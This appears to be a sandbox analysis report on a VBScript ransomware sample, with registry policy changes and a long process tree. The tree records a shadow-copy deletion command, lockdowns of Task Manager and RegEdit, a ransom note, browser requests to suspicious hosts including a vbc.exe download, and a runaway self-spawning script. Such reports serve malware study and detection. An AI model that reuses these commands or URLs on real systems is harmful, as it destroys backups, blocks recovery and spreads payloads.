Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableCMD = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\InactivityTimeoutSecs = "0"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "msconfig.exe"	wscript.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ransom.Win32.LCrypt0rX.A\LCrypt0rX.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2508
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Ransom.Win32.LCrypt0rX.A\LCrypt0rX.vbs" /elevated
  2⤵
  - UAC bypass
  - Blocklisted process makes network request
  - Blocks application from running via registry modification
  - Disables RegEdit via registry modification
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops file in System32 directory
  - Sets desktop wallpaper using registry
  - Modifies Control Panel
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2336
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2068
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:1864
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\READMEPLEASE.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:2900
- - C:\Windows\System32\RUNDLL32.EXE
    "C:\Windows\System32\RUNDLL32.EXE" user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2976
- - C:\Windows\System32\cmd.exe
    cmd /c ""C:\Windows\System32\iamthedoom.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:2664
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:560
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:560 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2680
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2076
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2076 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1160
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:1656
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2936
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2936 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1904
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1504
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1504 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1524
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2756
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2756 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3384
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:2772
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer Phishing Filter
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1864
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1864 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3604
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2292
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2292 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3084
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2688
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1648
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1648 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3096
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2784
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2784 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3580
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1996
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1996 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1932
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:876
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1732
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1732 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1952
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2412
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2412 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3592
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2604
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1296
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1296 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2088
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2972
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2972 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3692
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2400
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2400 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3984
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:3036
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1956
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1956 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1828
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:3048
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3048 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3968
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:1888
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:484
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:484 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3992
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2980
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2980 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3976
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1556
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1556 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4240
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:3820
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:4424
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2636
  - - C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
      4⤵
      PID:2864
    - - C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        5⤵
        
        PID:536
      - C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        6⤵
        
        PID:2096
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        7⤵
        
        PID:3724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        8⤵
        
        PID:3600
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        9⤵
        
        PID:3948
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        10⤵
        
        PID:4192
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        11⤵
        
        PID:4316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        12⤵
        
        PID:4476
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        13⤵
        
        PID:4640
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        14⤵
        
        PID:4748
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        15⤵
        
        PID:5104
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        16⤵
        
        PID:4340
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        17⤵
        
        PID:4408
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        18⤵
        
        PID:4872
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        19⤵
        
        PID:4180
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        20⤵
        
        PID:4664
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        21⤵
        
        PID:5248
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        22⤵
        
        PID:5316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        23⤵
        
        PID:5408
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        24⤵
        
        PID:5508
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        25⤵
        
        PID:5588
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        26⤵
        
        PID:5636
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        27⤵
        
        PID:5684
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        28⤵
        
        PID:5768
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        29⤵
        
        PID:5812
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        30⤵
        
        PID:5864
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        31⤵
        
        PID:5924
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        32⤵
        
        PID:5972
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        33⤵
        
        PID:5572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        34⤵
        
        PID:5364
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        35⤵
        
        PID:3720
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        36⤵
        
        PID:5464
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        37⤵
        
        PID:6284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        38⤵
        
        PID:6460
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        39⤵
        
        PID:6728
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        40⤵
        
        PID:6884
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        41⤵
        
        PID:6984
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        42⤵
        
        PID:7052
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        43⤵
        
        PID:7156
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        44⤵
        
        PID:6436
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        45⤵
        
        PID:6608
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        46⤵
        
        PID:6652
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        47⤵
        
        PID:6812
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        48⤵
        
        PID:6936
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        49⤵
        
        PID:4156
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        50⤵
        
        PID:7108
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        51⤵
        
        PID:1960
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        52⤵
        
        PID:6684
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        53⤵
        
        PID:6192
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        54⤵
        
        PID:6964
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        55⤵
        
        PID:7180
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        56⤵
        
        PID:7216
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        57⤵
        
        PID:7252
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        58⤵
        
        PID:7288
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        59⤵
        
        PID:7324
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        60⤵
        
        PID:7364
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        61⤵
        
        PID:7400
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        62⤵
        
        PID:7436
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        63⤵
        
        PID:7476
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        64⤵
        
        PID:7512
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        65⤵
        
        PID:7548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        66⤵
        
        PID:7588
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        67⤵
        
        PID:7624
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        68⤵
        
        PID:7660
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        69⤵
        
        PID:7696
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        70⤵
        
        PID:7736
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        71⤵
        
        PID:7772
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        72⤵
        
        PID:7812
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        73⤵
        
        PID:7852
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        74⤵
        
        PID:7888
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        75⤵
        
        PID:7924
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        76⤵
        
        PID:7972
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        77⤵
        
        PID:8012
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        78⤵
        
        PID:8052
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        79⤵
        
        PID:8092
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        80⤵
        
        PID:8128
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        81⤵
        
        PID:8168
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        82⤵
        
        PID:7316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        83⤵
        
        PID:7616
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        84⤵
        
        PID:7916
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        85⤵
        
        PID:7244
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        86⤵
        
        PID:8208
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        87⤵
        
        PID:8248
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        88⤵
        
        PID:8284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        89⤵
        
        PID:8328
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        90⤵
        
        PID:8364
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        91⤵
        
        PID:8408
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        92⤵
        
        PID:8440
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        93⤵
        
        PID:8476
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        94⤵
        
        PID:8512
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        95⤵
        
        PID:8552
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        96⤵
        
        PID:8588
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        97⤵
        
        PID:8624
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        98⤵
        
        PID:8660
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        99⤵
        
        PID:8700
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        100⤵
        
        PID:8736
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        101⤵
        
        PID:8780
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        102⤵
        
        PID:8820
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        103⤵
        
        PID:8860
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        104⤵
        
        PID:8896
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        105⤵
        
        PID:8936
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        106⤵
        
        PID:8976
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
